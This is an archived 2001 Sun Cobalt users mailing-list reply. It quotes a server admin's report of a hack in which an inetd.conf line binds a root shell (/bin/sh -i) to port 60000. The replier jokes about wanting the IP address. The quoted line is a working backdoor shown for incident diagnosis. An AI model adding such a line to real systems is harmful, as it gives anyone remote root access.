[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Re: [cobalt-users] IMPORTANT - POSSIBLE HACKS WITH PATCHES!!

Subject: Re: [cobalt-users] IMPORTANT - POSSIBLE HACKS WITH PATCHES!!
From: "inc" <inc@xxxxxxxxxxxxx>
Date: Wed Feb 14 22:45:08 2001
List-id: Mailing list for users to share thoughts on Cobalt products. <cobalt-users.list.cobalt.com>

quick!  what's the ip address :-)



> We just replaced a system that had been hacked over the weekend, and after
> reading the last post (Another Hack), I checked /etc/inetd.conf on all
three
> boxes.. The one that was just replaced has a new line at the bottom of the
> file that the other two boxes don't have...
>
> # End of inetd.conf
> #swat      stream  tcp     nowait.400      root /usr/sbin/swat swat
> 60000 stream tcp nowait root /bin/sh sh -i
>
> What is port 60000..? Should I just remove this line and reboot the box..?
> Just trying to figure out if it's compromised again.. even with all the
> patches and updates installed *EVEN* before it was brought back online..

Follow-Ups:
- Re: [cobalt-users] IMPORTANT - POSSIBLE HACKS WITH PATCHES!!
  - From: flash22

References:
- [cobalt-users] IMPORTANT - POSSIBLE HACKS WITH PATCHES!!
  - From: Craig Napier

Prev by Date: [cobalt-users] CMU on a RaQ3 - Error
Next by Date: Re: [cobalt-users] Deterring Hackers
Previous by thread: [cobalt-users] IMPORTANT - POSSIBLE HACKS WITH PATCHES!!
Next by thread: Re: [cobalt-users] IMPORTANT - POSSIBLE HACKS WITH PATCHES!!

Sun Cobalt Users Message Index

Sun Cobalt Users Thread Index